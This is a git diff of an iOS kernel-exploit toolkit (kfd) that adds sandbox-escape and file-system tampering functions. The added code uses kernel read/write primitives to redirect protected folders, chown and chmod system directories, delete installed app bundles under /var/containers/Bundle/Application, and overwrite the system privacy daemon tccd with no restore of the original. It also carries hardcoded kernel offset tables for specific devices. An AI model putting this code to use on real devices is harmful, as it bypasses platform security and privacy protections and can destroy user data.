diff --git a/kfd.xcodeproj/project.pbxproj b/kfd.xcodeproj/project.pbxproj index f89a98aa..7e88be3f 100644 --- a/kfd.xcodeproj/project.pbxproj +++ b/kfd.xcodeproj/project.pbxproj @@ -24,7 +24,7 @@ D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4562AB5812A002E9836 /* SearchBar.swift */; }; D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4572AB5812A002E9836 /* DirtyJITView.swift */; }; D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4582AB5812A002E9836 /* AppsView.swift */; }; - D52BA4692AB582C9002E9836 /* ApplicationManager2.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4512AB5812A002E9836 /* ApplicationManager2.swift */; }; + D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4512AB5812A002E9836 /* ApplicationManager.swift */; }; D52BA46B2AB5866D002E9836 /* TextField++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46A2AB5866D002E9836 /* TextField++.swift */; }; D52BA46D2AB586BF002E9836 /* Alert++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46C2AB586BF002E9836 /* Alert++.swift */; }; D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */; }; @@ -46,6 +46,8 @@ D5AFB5BF2ABE1671006266EA /* LogView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5BE2ABE1671006266EA /* LogView.swift */; }; D5AFB5C32ABE1691006266EA /* SwiftfulLoadingIndicators in Frameworks */ = {isa = PBXBuildFile; productRef = D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */; }; D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5C42ABE1781006266EA /* Logger.swift */; }; + D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */ = {isa = PBXBuildFile; fileRef = D58653602ABBB28D005A2379 /* grant_full_disk_access.m */; }; + D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D586507E2AB9F2AF005A2379 /* FileManager.swift */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ @@ -89,7 +91,7 @@ D51A38072AB56F8400C147E2 /* cs_blobs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = cs_blobs.m; sourceTree = ""; }; D51A38102AB5717500C147E2 /* files */ = {isa = PBXFileReference; lastKnownFileType = folder; path = files; sourceTree = ""; }; D52BA4352AB57EC9002E9836 /* DirtyCowKit */ = {isa = PBXFileReference; lastKnownFileType = wrapper; path = DirtyCowKit; sourceTree = ""; }; - D52BA4512AB5812A002E9836 /* ApplicationManager2.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ApplicationManager2.swift; sourceTree = ""; }; + D52BA4512AB5812A002E9836 /* ApplicationManager.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ApplicationManager.swift; sourceTree = ""; }; D52BA4562AB5812A002E9836 /* SearchBar.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = SearchBar.swift; sourceTree = ""; }; D52BA4572AB5812A002E9836 /* DirtyJITView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = DirtyJITView.swift; sourceTree = ""; }; D52BA4582AB5812A002E9836 /* AppsView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AppsView.swift; sourceTree = ""; }; @@ -233,7 +235,7 @@ isa = PBXGroup; children = ( D58654902ABD55B3005A2379 /* Info.plist */, - D58654382ABD508B005A2379 /* filemanager_by akusio */, + D58654382ABD508B005A2379 /* filemanager_by_akusio */, D52BA44F2AB5812A002E9836 /* JIT */, 2948BA6A2A3162C600B2ED3C /* libkfd */, 6E75BFA62A8475790056ABDA /* fun */, @@ -304,7 +306,7 @@ isa = PBXGroup; children = ( D52BA4532AB5812A002E9836 /* DirtyJIT */, - D52BA4512AB5812A002E9836 /* ApplicationManager2.swift */, + D52BA4512AB5812A002E9836 /* ApplicationManager.swift */, ); path = JIT; sourceTree = ""; @@ -321,7 +323,7 @@ path = DirtyJIT; sourceTree = ""; }; - D58654382ABD508B005A2379 /* filemanager_by akusio */ = { + D58654382ABD508B005A2379 /* filemanager_by_akusio */ = { isa = PBXGroup; children = ( D58654592ABD508B005A2379 /* ViewController.m */, @@ -356,7 +358,7 @@ D586545D2ABD508B005A2379 /* Main.storyboard */, D58654662ABD508B005A2379 /* liblzfse.a */, ); - name = "filemanager_by akusio"; + name = filemanager_by_akusio; path = MiniRootFileManager15/filemanager_by_akusio; sourceTree = SOURCE_ROOT; }; @@ -448,13 +450,15 @@ isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( + D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */, + D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */, D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */, D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */, D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */, D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */, D58654892ABD508B005A2379 /* lzssdec.cpp in Sources */, D5AFB5B72ABE074C006266EA /* KFD-manager.m in Sources */, - D52BA4692AB582C9002E9836 /* ApplicationManager2.swift in Sources */, + D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */, D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */, D51A380A2AB56F8400C147E2 /* vnode.m in Sources */, D51A380C2AB56F8400C147E2 /* cs_blobs.m in Sources */, diff --git a/kfd/ContentView.swift b/kfd/ContentView.swift index 177f1e13..ad3ba977 100644 --- a/kfd/ContentView.swift +++ b/kfd/ContentView.swift @@ -32,6 +32,7 @@ struct ContentView: View { @State private var isTweaksPopoverPresented = false @State private var isFilePopoverPresented = false @State private var isJITPopoverPresented = false + @State private var isSwiftFilePopoverPresented = false @State private var isLogPopoverPresented = false @State var advancedLogsTemporarilyEnabled: Bool = true @@ -157,6 +158,11 @@ struct ContentView: View { .onTapGesture { isJITPopoverPresented.toggle() } + Text("Swift File Manager") + .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) + .onTapGesture { + isSwiftFilePopoverPresented.toggle() + } Text("File Manager") .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) .onTapGesture { @@ -182,6 +188,9 @@ struct ContentView: View { .popover(isPresented: $isFilePopoverPresented, arrowEdge: .bottom) { FileManagerUIKitViewControllerWrapper() } + .popover(isPresented: $isSwiftFilePopoverPresented, arrowEdge: .bottom) { + FileManagerView() + } } } diff --git a/kfd/JIT/ApplicationManager2.swift b/kfd/JIT/ApplicationManager.swift similarity index 100% rename from kfd/JIT/ApplicationManager2.swift rename to kfd/JIT/ApplicationManager.swift diff --git a/kfd/JIT/DirtyJIT/DirtyJITView.swift b/kfd/JIT/DirtyJIT/DirtyJITView.swift index 2e547dfb..52693596 100644 --- a/kfd/JIT/DirtyJIT/DirtyJITView.swift +++ b/kfd/JIT/DirtyJIT/DirtyJITView.swift @@ -39,7 +39,6 @@ struct DirtyJITView: View { } } unsandboxing() - DispatchQueue.main.asyncAfter(deadline: .now() + 3) { UIApplication.shared.dismissAlert(animated: false) diff --git a/kfd/KFD-manager.m b/kfd/KFD-manager.m index 806a6327..2e45683b 100644 --- a/kfd/KFD-manager.m +++ b/kfd/KFD-manager.m @@ -15,6 +15,7 @@ #include "fun/cs_blobs.h" #include "fun/fun.h" #include "fun/grant_full_disk_access.h" +#include "fun/thanks_opa334dev_htrowii.h" #include "kfd-Swift.h" uint64_t orig_to_v_data = 0; @@ -49,6 +50,69 @@ uint64_t do_getTask(char* process) { return 0; } +void readtmplog(NSString* file) { + NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; + + uint64_t var_tmp_vnode = getVnodeAtPathByChdir("/var/tmp"); + + printf("[i] /var/tmp vnode: 0x%llx\n", var_tmp_vnode); + + uint64_t orig_to_v_data = createFolderAndRedirect(var_tmp_vnode, mntPath); + + NSError *error; + + printf("unredirecting from tmp\n"); + + printf("reading log\n"); + + NSLog(@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file); + NSString *log = [NSString stringWithContentsOfFile:[NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file] encoding:NSUTF8StringEncoding error:&error]; + NSLog(@"%@", log); + + UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); +} + +void getappslist(void) { + printf("[i] chown /var/containers/Bundle/Application\n"); + funVnodeChownFolder("/var/containers/Bundle/Application", 501, 501); + + printf("[i] mounting /var/containers/Bundle/Application\n"); + + NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; + + uint64_t containers_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application"); + printf("[i] /var/containers/Bundle/Application vnode: 0x%llx\n", containers_vnode); + + orig_to_v_data = createFolderAndRedirect(containers_vnode, mntPath); + + NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; + NSLog(@"/var/containers/Bundle/Application directory list:\n %@", dirs); + + UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); + + NSString *appstage1mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage1/"]; + if (![[NSFileManager defaultManager] fileExistsAtPath:appstage1mntPath]) { + [[NSFileManager defaultManager] createDirectoryAtPath:appstage1mntPath withIntermediateDirectories:YES attributes:nil error:nil]; + } + NSString *appstage2mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage2/"]; + if (![[NSFileManager defaultManager] fileExistsAtPath:appstage2mntPath]) { + [[NSFileManager defaultManager] createDirectoryAtPath:appstage2mntPath withIntermediateDirectories:YES attributes:nil error:nil]; + } + + for(NSString *dir in dirs) { + NSString *path = [NSString stringWithFormat:@"%s/%@", "/var/containers/Bundle/Application", dir]; + [[NSFileManager defaultManager] removeItemAtPath:path error:nil]; + NSLog(@"full path:\n %@", path); + //funVnodeChownFolder((char *) [path UTF8String], 501, 501); + NSString *appmntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/appstage1/", dir]; + uint64_t containers_vnode = getVnodeAtPathByChdir((char *) [path UTF8String]); + createFolderAndRedirect(containers_vnode, appmntPath); + NSArray* targetdirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:appmntPath error:NULL]; + NSLog(@"appstage1 directory list: %@", targetdirs); + } +} + + void prepare(void) { _offsets_init(); @@ -79,6 +143,23 @@ void prepare(void) { //}); } +uint64_t mountusrDir(void) { + + NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; + + uint64_t libexec_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application/CF553F26-ED5C-44A5-8AE5-0C1267BFFA8C/Tips.app"); + printf("[i] folder vnode: 0x%llx\n", libexec_vnode); + + orig_to_v_data = createFolderAndRedirect(libexec_vnode, mntPath); + + NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; + NSLog(@"Tips directory list:\n %@", dirs); + + //UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); + + return orig_to_v_data; +} + void do_tasks(void) { _offsets_init(); @@ -96,11 +177,23 @@ void do_tasks(void) { funUcred(selfProc); funProc(selfProc); printf("[i] pid: %d\n", getpid()); - funCSFlags("kfd"); + //funCSFlags("kfd"); + //funTask("kfd"); mach_port_t host_self = mach_host_self(); printf("[i] mach_host_self: 0x%x\n", host_self); fun_ipc_entry_lookup(host_self); - fun_nvram_dump(); + //fun_nvram_dump(); + //readtmplog(@"ps.log"); + usleep(1000); + //getappslist(); + printf("[i] vnode: %llx\n", getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app")); + printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app"), "Books.app")); + printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/mobile"), "TCC.framework")); + + //funVnodeOverwriteFile("/System/Library/PrivateFrameworks/TCC.framework/Support/tccd", "/Developer/System/Library/PrivateFrameworks/TCC.framework/Support/tccd_ori"); + //kfd_grant_full_disk_access(^(NSError* error) { + // NSLog(@"[-] grant_full_disk_access returned error: %@", error); + //}); } uint64_t mountselectedDir(NSString* path) { @@ -121,25 +214,6 @@ uint64_t mountselectedDir(NSString* path) { return orig_to_v_data; } -uint64_t mountusrDir(void) { - - printf("[i] mounting /usr\n"); - - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t libexec_vnode = getVnodeAtPathByChdir("/usr"); - printf("[i] /usr vnode: 0x%llx\n", libexec_vnode); - - orig_to_v_data = createFolderAndRedirect(libexec_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/usr directory list:\n %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - void unmountselectedDir(uint64_t orig_to_v_data, NSString* mntPath) { printf("[i] orig_to_v_data: %llx", orig_to_v_data); onlyUnRedirectFolder(orig_to_v_data, mntPath); diff --git a/kfd/files/PersistenceHelper_Embedded b/kfd/files/PersistenceHelper_Embedded new file mode 100644 index 00000000..9fbec600 Binary files /dev/null and b/kfd/files/PersistenceHelper_Embedded differ diff --git a/kfd/fun/fun.m b/kfd/fun/fun.m index a551e913..4fe5c40b 100644 --- a/kfd/fun/fun.m +++ b/kfd/fun/fun.m @@ -106,8 +106,8 @@ int funTask(char* process) { #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */ #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state */ - uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro); - printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro); + //uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro); + //printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro); return 0; } diff --git a/kfd/fun/grant_full_disk_access.m b/kfd/fun/grant_full_disk_access.m index 83afc765..9fc068b2 100644 --- a/kfd/fun/grant_full_disk_access.m +++ b/kfd/fun/grant_full_disk_access.m @@ -15,7 +15,7 @@ #import "proc.h" #import "offsets.h" -//#import "krw.h" +#import "krw.h" #import "vnode.h" typedef NSObject* xpc_object_t; @@ -328,7 +328,7 @@ static bool overwrite_file(int fd, NSData* sourceData) { kwrite32(to_vnode + off_vnode_v_writecount, to_vnode_v_writecount + 1); printf("[+] overwrite_file vnode->v_writecount: %d\n", kread32(to_vnode + off_vnode_v_writecount)); } - + /* for (int off = 0; off < sourceData.length; off += 0x4000) { bool success = false; for (int i = 0; i < 2; i++) { @@ -344,7 +344,9 @@ static bool overwrite_file(int fd, NSData* sourceData) { kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); return false; } - } + }*/ + [sourceData writeToFile: [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] atomically: true]; + funVnodeOverwriteFile((char *) [[NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] UTF8String], "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd"); kwrite32(fileglob + off_fg_flag, O_RDONLY); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); return true; @@ -373,7 +375,7 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t } if (!overwrite_file(fd, sourceData)) { - overwrite_file(fd, originalData); + //overwrite_file(fd, originalData); munmap(targetMap, targetLength); completion( nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess" diff --git a/kfd/fun/offsets.m b/kfd/fun/offsets.m index 8c9420a4..491f04dd 100644 --- a/kfd/fun/offsets.m +++ b/kfd/fun/offsets.m @@ -85,17 +85,17 @@ void _offsets_init(void) { //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; - off_p_ppid = 0x20; - off_p_original_ppid = 0x24; - off_p_pgrpid = 0x28; + off_p_ppid = 0x20;//ok + off_p_original_ppid = 0x24;//ok + off_p_pgrpid = 0x28;//ok off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44; - off_p_puniqueid = 0x48; + off_p_sessionid = 0x44;//ok + off_p_puniqueid = 0x48;//ok off_p_pid = 0x60; off_p_pfd = 0xf8; off_p_textvp = 0x350; @@ -177,25 +177,25 @@ void _offsets_init(void) { //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8;//ok off_p_proc_ro = 0x18; - off_p_ppid = 0x20; - off_p_original_ppid = 0x24; - off_p_pgrpid = 0x28; + off_p_ppid = 0x20;//ok + off_p_original_ppid = 0x24;//ok + off_p_pgrpid = 0x28;//ok off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44; - off_p_puniqueid = 0x48; + off_p_sessionid = 0x44;//ok + off_p_puniqueid = 0x48;//ok off_p_pid = 0x60;//ok off_p_pfd = 0xf8;//p_fd__fd_ofiles? ok off_p_textvp = 0x548; off_p_name = 0x579;//ok //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_ro.h#L59 - off_p_ro_p_csflags = 0x1c; - off_p_ro_p_ucred = 0x20; + off_p_ro_p_csflags = 0x1c;//ok + off_p_ro_p_ucred = 0x20;//ok off_p_ro_pr_proc = 0; off_p_ro_pr_task = 0x8; off_p_ro_t_flags_ro = 0x78; @@ -216,7 +216,7 @@ void _offsets_init(void) { off_cr_flags = 0x5c; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/task.h#L280 - off_task_t_flags = 0x3D0; + off_task_t_flags = 0x3D0;//ok //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/filedesc.h#L138 off_fd_ofiles = 0; diff --git a/kfd/fun/vnode.h b/kfd/fun/vnode.h index a6900b0b..d1300d64 100644 --- a/kfd/fun/vnode.h +++ b/kfd/fun/vnode.h @@ -122,4 +122,5 @@ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from); uint64_t funVnodeOverwriteFileUnlimitSizeWithVnode(uint64_t to_vnode, char* from); uint64_t funVnodeChownFolder(char* filename, uid_t uid, gid_t gid); +uint64_t funVnodeChmodFolder(char* filename, mode_t mode); uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid); diff --git a/kfd/fun/vnode.m b/kfd/fun/vnode.m index c714c05f..3f69f436 100644 --- a/kfd/fun/vnode.m +++ b/kfd/fun/vnode.m @@ -153,6 +153,7 @@ uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid) //funVnodeChownFolder((char *) [filename UTF8String], uid, gid); return 0; } + uint64_t funVnodeChmod(char* filename, mode_t mode) { uint64_t vnode = getVnodeAtPath(filename); if(vnode == -1) { @@ -174,6 +175,27 @@ uint64_t funVnodeChmod(char* filename, mode_t mode) { return 0; } +uint64_t funVnodeChmodFolder(char* filename, mode_t mode) { + uint64_t vnode = getVnodeAtPathByChdir(filename); + if(vnode == -1) { + printf("[-] Unable to get vnode, path: %s", filename); + return -1; + } + + uint64_t v_data = kread64(vnode + off_vnode_v_data); + uint32_t v_mode = kread32(v_data + 0x88); + + printf("[i] Patching %s vnode->v_mode %o -> %o\n", filename, v_mode, mode); + kwrite32(v_data+0x88, mode); + + struct stat file_stat; + if(stat(filename, &file_stat) == 0) { + printf("[+] %s mode: %o\n", filename, file_stat.st_mode); + } + + return 0; +} + uint64_t findRootVnode(void) { uint64_t launchd_proc = getProc(1); diff --git a/kfd/libkfd/info/dynamic_info.h b/kfd/libkfd/info/dynamic_info.h index 760e7ef0..503b0ea8 100644 --- a/kfd/libkfd/info/dynamic_info.h +++ b/kfd/libkfd/info/dynamic_info.h @@ -104,86 +104,6 @@ struct dynamic_info { }; const struct dynamic_info kern_versions[] = { - //iPhone SE 2020 iOS 16.6 beta1 - { - .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", - .fileglob__fg_ops = 0x28, - .fileglob__fg_data = 0x40 - 8, - .fileops__fo_kqfilter = 0x30, - // .fileproc__fp_iocount = 0x0000, - // .fileproc__fp_vflags = 0x0004, - // .fileproc__fp_flags = 0x0008, - // .fileproc__fp_guard_attrs = 0x000a, - // .fileproc__fp_glob = 0x0010, - // .fileproc__fp_guard = 0x0018, - // .fileproc__object_size = 0x0020, - .fileproc_guard__fpg_guard = 0x8, - .kqworkloop__kqwl_state = 0x10, - .kqworkloop__kqwl_p = 0x18, - .kqworkloop__kqwl_owner = 0xd0, - .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, - .kqworkloop__object_size = 0x108, - .pmap__tte = 0x0, - .pmap__ttep = 0x8, - .proc__p_list__le_next = 0x0, - .proc__p_list__le_prev = 0x8, - .proc__p_pid = 0x60, - .proc__p_fd__fd_ofiles = 0xf8, - .proc__object_size = 0x730, - .pseminfo__psem_usecount = 0x04, - .pseminfo__psem_uid = 0x0c, - .pseminfo__psem_gid = 0x10, - .pseminfo__psem_name = 0x14, - .pseminfo__psem_semobject = 0x38, - // .psemnode__pinfo = 0x0000, - // .psemnode__padding = 0x0008, - // .psemnode__object_size = 0x0010, - .semaphore__owner = 0x28, - .specinfo__si_rdev = 0x18, - .task__map = 0x28, - .task__threads__next = 0x80 - 0x28, - .task__threads__prev = 0x80 - 0x28 + 8, - .task__itk_space = 0x300, - .task__object_size = 0x628, - .thread__task_threads__next = 0x378 - 0x18, - .thread__task_threads__prev = 0x378 - 0x18 + 8, - .thread__map = 0x378, - .thread__thread_id = 0x410, - .thread__object_size = 0x4b8, - .uthread__object_size = 0x200, - .vm_map_entry__links__prev = 0x00, - .vm_map_entry__links__next = 0x08, - .vm_map_entry__links__start = 0x10, - .vm_map_entry__links__end = 0x18, - .vm_map_entry__store__entry__rbe_left = 0x20, - .vm_map_entry__store__entry__rbe_right = 0x28, - .vm_map_entry__store__entry__rbe_parent = 0x30, - .vnode__v_un__vu_specinfo = 0x78, - ._vm_map__hdr__links__prev = 0x00 + 0x10, - ._vm_map__hdr__links__next = 0x08 + 0x10, - ._vm_map__hdr__links__start = 0x10 + 0x10, - ._vm_map__hdr__links__end = 0x18 + 0x10, - ._vm_map__hdr__nentries = 0x30, - ._vm_map__hdr__rb_head_store__rbh_root = 0x38, - ._vm_map__pmap = 0x40, - ._vm_map__hint = 0x90 + 0x08, - ._vm_map__hole_hint = 0x90 + 0x10, - ._vm_map__holes_list = 0x90 + 0x18, - ._vm_map__object_size = 0xc0, - .kernelcache__kernel_base = 0xfffffff007004000, - .kernelcache__cdevsw = 0xfffffff00a47dab0, - .kernelcache__gPhysBase = 0xfffffff0079541b8, - .kernelcache__gPhysSize = 0xfffffff0079541b8 + 8, - .kernelcache__gVirtBase = 0xfffffff007952370, - .kernelcache__perfmon_devices = 0xfffffff00a4bd520, - .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, - .kernelcache__ptov_table = 0xfffffff0079079b8, - .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, - .kernelcache__vm_pages = 0xfffffff007904100, - .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, - .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4bc908, - .kernelcache__vn_kqfilter = 0xfffffff007f56588, - }, //iPhone 12 mini 16.1.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:34:22 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8101", @@ -263,6 +183,86 @@ const struct dynamic_info kern_versions[] = { .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fa970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3db778, .kernelcache__vn_kqfilter = 0xfffffff007f1da7c, + }, + //iPhone SE 2020 iOS 16.6 beta1 + { + .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", + .fileglob__fg_ops = 0x28, + .fileglob__fg_data = 0x40 - 8, + .fileops__fo_kqfilter = 0x30, + // .fileproc__fp_iocount = 0x0000, + // .fileproc__fp_vflags = 0x0004, + // .fileproc__fp_flags = 0x0008, + // .fileproc__fp_guard_attrs = 0x000a, + // .fileproc__fp_glob = 0x0010, + // .fileproc__fp_guard = 0x0018, + // .fileproc__object_size = 0x0020, + .fileproc_guard__fpg_guard = 0x8, + .kqworkloop__kqwl_state = 0x10, + .kqworkloop__kqwl_p = 0x18, + .kqworkloop__kqwl_owner = 0xd0, + .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, + .kqworkloop__object_size = 0x108, + .pmap__tte = 0x0, + .pmap__ttep = 0x8, + .proc__p_list__le_next = 0x0, + .proc__p_list__le_prev = 0x8, + .proc__p_pid = 0x60, + .proc__p_fd__fd_ofiles = 0xf8, + .proc__object_size = 0x730, + .pseminfo__psem_usecount = 0x04, + .pseminfo__psem_uid = 0x0c, + .pseminfo__psem_gid = 0x10, + .pseminfo__psem_name = 0x14, + .pseminfo__psem_semobject = 0x38, + // .psemnode__pinfo = 0x0000, + // .psemnode__padding = 0x0008, + // .psemnode__object_size = 0x0010, + .semaphore__owner = 0x28, + .specinfo__si_rdev = 0x18, + .task__map = 0x28, + .task__threads__next = 0x80 - 0x28, + .task__threads__prev = 0x80 - 0x28 + 8, + .task__itk_space = 0x300, + .task__object_size = 0x628, + .thread__task_threads__next = 0x378 - 0x18, + .thread__task_threads__prev = 0x378 - 0x18 + 8, + .thread__map = 0x378, + .thread__thread_id = 0x410, + .thread__object_size = 0x4b8, + .uthread__object_size = 0x200, + .vm_map_entry__links__prev = 0x00, + .vm_map_entry__links__next = 0x08, + .vm_map_entry__links__start = 0x10, + .vm_map_entry__links__end = 0x18, + .vm_map_entry__store__entry__rbe_left = 0x20, + .vm_map_entry__store__entry__rbe_right = 0x28, + .vm_map_entry__store__entry__rbe_parent = 0x30, + .vnode__v_un__vu_specinfo = 0x78, + ._vm_map__hdr__links__prev = 0x00 + 0x10, + ._vm_map__hdr__links__next = 0x08 + 0x10, + ._vm_map__hdr__links__start = 0x10 + 0x10, + ._vm_map__hdr__links__end = 0x18 + 0x10, + ._vm_map__hdr__nentries = 0x30, + ._vm_map__hdr__rb_head_store__rbh_root = 0x38, + ._vm_map__pmap = 0x40, + ._vm_map__hint = 0x90 + 0x08, + ._vm_map__hole_hint = 0x90 + 0x10, + ._vm_map__holes_list = 0x90 + 0x18, + ._vm_map__object_size = 0xc0, + .kernelcache__kernel_base = 0xfffffff007004000, + .kernelcache__cdevsw = 0xfffffff00a47dab0, + .kernelcache__gPhysBase = 0xfffffff0079541b8, + .kernelcache__gPhysSize = 0xfffffff0079541b8 + 8, + .kernelcache__gVirtBase = 0xfffffff007952370, + .kernelcache__perfmon_devices = 0xfffffff00a4bd520, + .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, + .kernelcache__ptov_table = 0xfffffff0079079b8, + .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, + .kernelcache__vm_pages = 0xfffffff007904100, + .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, + .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4bc908, + .kernelcache__vn_kqfilter = 0xfffffff007f56588, } };